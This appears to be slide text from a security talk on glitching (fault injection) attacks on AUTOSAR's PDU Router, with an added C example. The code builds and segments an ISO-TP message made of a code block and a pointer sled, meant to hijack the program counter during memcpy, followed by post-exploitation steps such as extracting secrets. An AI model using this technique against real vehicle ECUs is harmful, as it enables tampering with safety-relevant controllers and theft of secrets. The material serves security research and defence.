AUTOSAR’s PDU Router
1. CAN driver receives 8-byte CAN frame
2. Frame passes the CAN interface
3. Payload is reassembled by ISO-TP
4. Payload is copied to COM or DCM
5. COM or DCM handles the payload

Where do we attack?!
Attacking AUTOSAR’s PDU router
• Step 1: Send an ISO-TP CAN message (< 4096 bytes)
  [Figure: layout of the message. Pointers pointing to the start of the payload; code blocks: Copy ‘Our task’ to ‘free memory’ → Modify pointer of IDLE task to ‘free memory’ → Continue with current task; data block: Our task]
• Step 2: We inject the glitch when the pointers are being copied
• Step 3: Successful glitches load a pointer into the PC register
• Step 4: MCU will execute the ISO-TP message (blue blocks)
• Step 5: Wait for IDLE task to be scheduled and execute our task
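Worked example of Step 1 and of the ISO-TP reassembly the PDU Router performs before the copy (added here; this is not the talk's code). The attacker side builds the message as a code block followed by a sled of pointers to the start of the payload and splits it into 8-byte CAN frames; the ECU side reassembles it the way step 3 of the PDU Router path does, checking the consecutive-frame sequence numbers; finally a simple glitch model counts how many aligned words of the reassembled payload would send PC to the payload start if the glitched copy loads one of them (Steps 2 and 3). Everything architecture-specific is assumed, not taken from the slides: a 32-bit little-endian MCU, ISO-TP over classic CAN, flow control treated as CTS with block size 0, 0xCC frame padding, the layout [code stub + our task][pointer sled], and `PAYLOAD_BASE` as a made-up RAM address. The code bytes are placeholders, not machine code.

```c
/* Added example, not the talk's code. Attacker side: build the Step 1 message as
 * [code stub + our task][sled of pointers to the payload start] and segment it.
 * ECU side: reassemble as the PDU Router path does before the copy to COM/DCM.
 * Then count the aligned words that steer PC to the payload start if the
 * glitched copy loads one of them. Assumed, not on the slides: little-endian
 * 32-bit MCU, classic CAN ISO-TP, CTS/BS=0 flow control, 0xCC padding. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CAN_DL       8
#define ISOTP_MAX    4095          /* 12-bit length field of the First Frame */
#define MAX_FRAMES   586           /* 1 FF (6 bytes) + 585 CFs (7 bytes) >= 4095 */
#define PAYLOAD_BASE 0x20001000u   /* assumed RAM address of the reassembled payload */

/* Code first, then the sled: any sled word loaded into PC starts execution at the code. */
size_t build_payload(uint8_t *out, size_t out_len, uint32_t base,
                     const uint8_t *code, size_t code_len, size_t sled_words)
{
    size_t need = code_len + 4 * sled_words;
    if (need > out_len || need > ISOTP_MAX || code_len % 4 != 0) return 0;
    memcpy(out, code, code_len);
    for (size_t i = 0; i < sled_words; i++) {
        uint8_t *w = out + code_len + 4 * i;          /* little-endian pointer */
        w[0] = (uint8_t)base;         w[1] = (uint8_t)(base >> 8);
        w[2] = (uint8_t)(base >> 16); w[3] = (uint8_t)(base >> 24);
    }
    return need;
}

/* ISO-TP sender: First Frame 0x1LLL + 6 bytes, then Consecutive Frames 0x2N + 7
 * bytes with N running 1..15,0,1,... Returns the frame count, 0 on error. */
size_t isotp_segment(const uint8_t *msg, size_t len,
                     uint8_t frames[][CAN_DL], size_t max_frames)
{
    if (len < 8 || len > ISOTP_MAX || max_frames == 0) return 0;
    frames[0][0] = (uint8_t)(0x10 | (len >> 8));
    frames[0][1] = (uint8_t)(len & 0xFF);
    memcpy(&frames[0][2], msg, 6);
    size_t n = 1, off = 6;
    for (uint8_t sn = 1; off < len; sn = (sn + 1) & 0x0F, n++) {
        if (n >= max_frames) return 0;
        size_t chunk = (len - off < 7) ? len - off : 7;
        memset(frames[n], 0xCC, CAN_DL);                /* assumed padding byte */
        frames[n][0] = (uint8_t)(0x20 | sn);
        memcpy(&frames[n][1], msg + off, chunk);
        off += chunk;
    }
    return n;
}

/* ECU side (step 3): reassemble, checking every CF sequence number; returns the
 * payload length that is then copied towards COM/DCM, 0 on a missing/reordered CF. */
size_t isotp_reassemble(const uint8_t frames[][CAN_DL], size_t n_frames,
                        uint8_t *out, size_t out_len)
{
    if (n_frames == 0 || (frames[0][0] & 0xF0) != 0x10) return 0;
    size_t len = ((size_t)(frames[0][0] & 0x0F) << 8) | frames[0][1];
    if (len < 8 || len > out_len) return 0;
    memcpy(out, &frames[0][2], 6);
    size_t off = 6; uint8_t expect = 1;
    for (size_t i = 1; i < n_frames && off < len; i++, expect = (expect + 1) & 0x0F) {
        if (frames[i][0] != (0x20 | expect)) return 0;
        size_t chunk = (len - off < 7) ? len - off : 7;
        memcpy(out + off, &frames[i][1], chunk);
        off += chunk;
    }
    return off == len ? len : 0;
}

/* Glitch model: if the fault makes the copy load an arbitrary aligned source word
 * into PC, how many words of the payload send PC to 'base'? */
size_t count_sled_hits(const uint8_t *payload, size_t len, uint32_t base)
{
    size_t hits = 0;
    for (size_t off = 0; off + 4 <= len; off += 4) {
        uint32_t w = (uint32_t)payload[off] | (uint32_t)payload[off + 1] << 8 |
                     (uint32_t)payload[off + 2] << 16 | (uint32_t)payload[off + 3] << 24;
        hits += (w == base);
    }
    return hits;
}

/* End to end: constructed 16-byte placeholder code block + 100-word sled (416 bytes,
 * 60 CAN frames). Returns the PC-steering word count after reassembly, -1 on failure;
 * corrupt_cf simulates a consecutive frame lost on the bus. */
int run_attack_message_demo(int corrupt_cf)
{
    static uint8_t code[16], msg[ISOTP_MAX], rx[ISOTP_MAX], frames[MAX_FRAMES][CAN_DL];
    memset(code, 0xEE, sizeof code);                      /* placeholder, not opcodes */
    size_t len = build_payload(msg, sizeof msg, PAYLOAD_BASE, code, sizeof code, 100);
    size_t nf = isotp_segment(msg, len, frames, MAX_FRAMES);
    if (len == 0 || nf == 0) return -1;
    if (corrupt_cf) frames[5][0] ^= 0x02;                 /* CF #5 now carries SN 7 */
    size_t rlen = isotp_reassemble(frames, nf, rx, sizeof rx);
    if (rlen != len || memcmp(msg, rx, len) != 0) return -1;
    return (int)count_sled_hits(rx, rlen, PAYLOAD_BASE);
}

int main(void)
{
    printf("PC-steering words after reassembly: %d\n", run_attack_message_demo(0));
    printf("same message with one corrupted CF: %d\n", run_attack_message_demo(1));
    return 0;
}
```

The point of the sled is timing tolerance: the glitch only has to land somewhere while the pointer region is being copied, and whichever word it picks, execution starts at the same place. On a real target the code region must also be valid instructions and the copy destination must be executable; both are target-specific and are not modelled here.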
Why does this work?
Attacking AUTOSAR’s PDU Router
[Figure: disassembled memcpy()]
We take control of the Program Counter (PC) during the copy!
We have our own task. Now what?!
Post Exploitation
• Extract information (secrets)
• Analyze firmware dynamically
• Perform additional attacks (e.g. side channel attack)